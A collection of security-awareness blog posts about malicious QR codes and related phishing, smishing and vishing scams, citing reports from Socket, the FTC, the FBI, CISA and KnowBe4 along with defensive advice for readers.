Search results for: QR

I love it when people come up to me and say they are “wicked paranoid” about QR codes. I have been trying to educate people on the risks of QR codes for years and that gives me satisfaction that I have prevented that person from becoming a victim of a malicious QR code. QR codes have become ubiquitous since the pandemic, starting with menuless menus. I ask for a paper menu, and surprisingly, most restaurants still have them.

Here’s another example to bolster my case. Bleeping Computer reported that the Socket Threat Research Team has identified “a malicious package, ‘fezbox’, published to npmjs.com, the world’s largest open-source registry for JavaScript and Node.js developers….which contains hidden instructions to fetch a JPG image containing a QR code, which it can then further process to run a second-stage obfuscated payload as a part of the attack.” What does this mean? If scanned, the payload will read a cookie with document.cookie. If there is a username and password in the stolen cookie, it can steal that information directly from the victim’s server. The threat actor then has the victim’s credentials to access the victim’s data, including sensitive and proprietary data.

According to Bleeping Computer,  “we have seen countless cases of QR codes deployed in social engineering scams…but these require human intervention…scanning the code and being led to a phishing website, for example…but this week’s discovery by Socket shows yet another twist on QR codes: a compromised machine can use them to talk to its command-and-control (C2) server in a way that, to a proxy or network security tool, may look like nothing more than ordinary image traffic.” Because the threats of malicious QR codes are not well-known yet, I anticipate that threat actors will continue to figure out ways to embed malicious code into them for various goals, including phishing, smishing, and credential stealing, and it will be hard to get out in front of the risk. One way to mitigate is to never scan a public QR code, never click on a QR code in an email, and be wicked paranoid about any QR code presented to you.

We have repeatedly warned our readers about malicious QR codes and their use by threat actors.

Threat actors are now using these codes to disguise packages as gifts. Upon opening the package, recipients find a note with instructions to scan a QR code to identify the sender. The code launches a website that asks for credentials to get more information about the “gift” and provides instructions for returns. The website could also ask for credit card or personal information.

It has become such a problem that the Federal Trade Commission (FTC) has issued a scam alert.

According to the FTC:

“If you scanned the QR code and entered your credentials, like your username and password, into a website, change your password right away. Create a strong password that is hard to guess, and turn on two-factor authentication.

If you’re concerned someone has your personal information, get your free credit report at AnnualCreditReport.com. Look for signs that someone is using your information, like accounts in your name you don’t recognize. (You can get a free credit report every week.)

Also review your credit card bills and bank account statements and look for transactions you didn’t make. And consider taking other steps to protect your identity, like freezing your credit or putting a fraud alert on your credit report.

If you think someone stole your identity, report it, and get a personal recovery plan at IdentityTheft.gov.”

This week is Identity Theft Protection Week. Sign up for the free resources provided by the Federal Trade Commission at ftc.gov and stay safe.

The recent increase in smishing and vishing schemes is prompting me to remind readers of schemes designed to trick users into providing credentials to perpetrate fraud. We have previously written on phishing, smishing, vishing, and QRishing schemes to increase awareness about these methods of intrusion.

HC3 recently warned the health care sector about vishing schemes designed to impersonate employees in order to access financial systems. See previous blog on this topic here.

The City of New York was recently forced to take its payroll system down for more than a week after a smishing scheme that was designed to steal employees’ pay. The attack targeted the city’s Automated Personnel System Employee Self Service users. The threat actor sent fake text messages with multi-factor authentication to employees with a link to insert their self-service credentials, including usernames, passwords, and copies of driver’s licenses. The scheme was designed to steal the information so the payroll system could be accessed in order to divert payroll to the threat actor’s account. 

Phishing, vishing, smishing, and QRishing continue to be successful ways for threat actors to perpetrate fraud. Applying a healthy dose of paranoia whenever you receive any request for credentials, whether by email, phone, text or through a QR code is warranted and wise.

I hate to say, “I told you so,” but I did. I have repeatedly warned against scanning QR codes. Following the pandemic and scanning QR codes at restaurants, people have become very comfortable with scanning QR codes, don’t think twice about it, and don’t fully grasp the risk associated with a malicious QR code. Find previous blog posts pertaining to QR codes here.

It is important to understand that just like malicious code embedded in a link or an attachment in an email or text (which we have been trained not to click on), a threat actor can embed malicious code into a QR code with the same results. Unfortunately, they are starting to do just that.

According to Dark Reading threat actors recently “sent more than 1,000 emails armed with malicious QR codes aimed at stealing Microsoft credentials” to an energy company, and other industries, including manufacturing, insurance, technology, and financial services.

The email phishing campaign with malicious QR codes was discovered by Cofense. According to Cofense, “This campaign makes use of a PDF or image file attachment with the QR code embedded into it… This makes it easier for the emails to bypass Secure Email Gateways.” The campaign is ongoing and “spreading quickly.” The bottom line is to train employees not to scan QR codes, received by email or text, and to alert the IT department if one is received. Everyone should treat QR codes with a high degree of suspicion, just like a suspicious text or email.

The FBI’s Internet Crime Complaint Center (IC3) recently issued a warning alerting consumers that scammers are using malicious QR Codes to reroute unsuspecting customers to malicious sites to try to steal their data.

Also known as QRishing, [view related post] criminals are taking advantage of our familiarity with QR codes after using them at restaurants and other establishments during the pandemic, to use them to commit crimes. The criminals embed malicious codes into QR codes to redirect a user to a malicious site and then attempt to get the user to provide personal information, financial information or other data that the criminals can use to perpetrate fraud or identity theft.

Embedding malicious code into a QR code is no different than embedding it into a link or attachment to a phishing email or a smishing text. Consumers are not as alert to question QR codes as we are to spot malicious emails and texts.

Hence, the alert from IC3. IC3 is warning consumers to check and re-check any URL generated by a QR code and to be cautious about using them for any form of payment.

QR codes should be viewed as suspiciously as emails and texts. Be cautious when asked to scan a QR code, and refuse to provide any type of personal information or financial information after scanning one.

We have previously alerted you to vishing and smishing schemes [view related post]. A new scheme, using QR codes, is called QRishing or quishing. According to security company Abnormal, between September 15 and October 13, 2021, it identified a new way for hackers to try to get around security measures put in place to keep users from clicking on malicious links or attachments. The phishing campaign they detected was designed to collect Microsoft credentials using QR codes.

According to Abnormal, the threat actors used compromised email accounts to send QR codes that looked like a missed voice mail to users.  Although the threat actors were unsuccessful in getting users to click on the QR code or take a picture of it and send it to their email account in order to click on it, the point is that attackers are getting increasingly more creative and embedding malicious code behind QR codes, which became widely used by restaurants and other establishments during COVID. Many people had never heard of a QR code or used one until COVID hit, and no one seems particularly concerned about taking a picture of a QR code when instructed to do so.

The tip here is to be cautious of QR codes, especially in an email or text, and specifically if someone is asking you to click on it or it is linked to a missed voicemail message. If QR codes are emailed, they might not be detected by the email security system, which is exactly what the attacker has designed it to do so it is delivered to your email box, giving you the chance to click on it and compromise your Outlook credentials. The new mantra is don’t click on suspicious links, attachments, or QR codes.

On November 24, 2025, the Cybersecurity & Infrastructure Security Agency (CISA) issued an alert titled “Spyware Allows Cyber Threat Actors to Target Users of Messaging Applications,” which outlines how “multiple cyber threat actors” are “leveraging commercial spyware to target users of mobile messaging applications.”

The threat actors “use sophisticated targeting and social engineering techniques to deliver spyware and gain unauthorized access to a victim’s messaging app, facilitating the deployment of additional malicious payloads that can further compromise the victim’s mobile device.”

According to the alert, the threat actors use tactics including:

  • Phishing and malicious device-linking QR codes to compromise victim accounts and link them to actor-controlled devices;
  • Zero-click exploits, which do not require direct action from the device user; and
  • Impersonation of messaging app platforms, such as Signal and WhatsApp.

The threat actors target “high-value individuals, such as current and former high-ranking government, military and political officials, as well as civil society organizations (CSOs) and individuals across the United States, Middle East and Europe.” CISA “strongly encourages messaging app users to review” its updated Mobile Communications Best Practice Guide and Mitigating Cyber Threats with Limited Resources: Guidance for Civil Society.

In a recent blog post, KnowBe4 reported that it has “uncovered an emerging advanced phishing campaign targeting Microsoft 365 users globally to steal their credentials. The attackers are wielding a powerful new tool that’s completely changing the game for cybercriminals—turning what used to be complex, technical phishing setups into simple one-click launches that can bypass certain technical controls.”

The tool is called “Quantum Route Redirect” KnowBe4 has observed attacks using Quantum Route Redirect since August 2025, and a new phishing kit is for sale that “comes with a pre-configured set up and phishing domains that significantly simplifies a once technically complex campaign flow, further ‘democratizing’ phishing for less skilled cybercriminals.”

The threat actors start the campaign with a phishing email using:

  • Docusign and other service agreement impersonation;
  • Payroll impersonation;
  • Payment notification emails;
  • “Missed voicemail messages”; and
  • QR code phishing (quishing)

Once the victim clicks on the malicious message, the threat actors download Quantum Route Redirect to host credential harvesting pages to attempt to steal credentials from users to be used to attack the victim company. As of the date of the blog post, KnowBe4 had identified approximately 1,000 domains hosting the tool.

One important observation is that there will soon be an upgrade for the kit “that will include QR code generation capabilities to enable Quantum Route Redirect users to significantly scale quishing attacks linked to the campaign.” We have been warning readers about malicious QR code attacks for several years, and these attacks continue to be effectively used by threat actors. KnowBe4’s prediction that threat actors will be able to “significantly scale” QRishing attacks using the Quantum Route Redirect tool emphasizes the continued need to educate users on the risk of QR codes and the technology behind QR codes so users will understand to never click on a QR code presented in an email.

The KnowBe4 blog post outlines the details of how threat actors are effectively using Quantum Route Redirect, which is helpful in developing user education materials. It is a good reminder to all of us to continue to be vigilant about suspicious requests contained in emails.

Everyone thinks they can spot a phish. Whether it is an email, SMS text, or QRish phishing, people have an overinflated view of their capabilities to detect them.

A new summary by KnowB4, “What Makes People Click?” provides an insightful review and proves that people still click when curiosity gets the best of them.

According to the summary of top-clicked phishing tests between January and March 2025, phishes impersonating HR or IT are the most successful. People were more likely to interact with links related to internal team topics, open PDFs, HTML files, and .doc Word files and continue to be vulnerable to impersonation of trusted company brands. The companies most likely to be impersonated as part of a successful phishing campaign are Microsoft, LinkedIn, the company the victim works for, Google, and Okta.

And then there are QR codes. Everyone makes fun of me for constantly warning about QR codes, and I am grateful to KnowB4 for having my back on this one. Its summary illustrates that users continue to be duped into scanning malicious QR codes. The top three successful QR scams are QR codes related to the company’s new drug and alcohol policy, a DocuSign for review and signing, and a happy birthday message from Workday. Please take these statistics to heart and beware of these and similar scams. Think twice before clicking on that Happy Birthday message from Workday.

I frequently conduct employee education sessions and carefully follow KnowBe4’s insights. It always has its finger on the pulse and provides practical solutions in real-time. Review its 1st quarter summary, which is jam-packed with useful information for yourself and your users. 

We have educated our readers about phishing, smishing, QRishing, and vishing scams, and now we’re warning you about what we have dubbed “snailing.” Yes, believe it or not, threat actors have gone retro and are using snail mail to try to extort victims. TechRadar is reporting that, according to GuidePoint Security, an organization received several letters in the mail, allegedly from the BianLian cybercriminal gang, stating:

“I regret to inform you that we have gained access to [REDACTED] systems and over the past several weeks have exported thousands of data files, including customer order and contact information, employee information with IDs, SSNs, payroll reports, and other sensitive HR documents, company financial documents, legal documents, investor and shareholder information, invoices, and tax documents.”

The letter alleges that the recipient’s network “is insecure and we were able to gain access and intercept your network traffic, leverage your personal email address, passwords, online accounts and other information to social engineer our way into [REDACTED] systems via your home network with the help of another employee.” The threat actors then demand $250,000-$350,000 in Bitcoin within ten days. They even offer a QR code in the letter that directs the recipient to the Bitcoin wallet.

It’s comical that the letters have a return address of an actual Boston office building.

GuidePoint Security says the letters and attacks mentioned in them are fake and are inconsistent with BianLian’s ransom notes. Apparently, these days, even threat actors get impersonated. Now you know—don’t get scammed by a snailing incident.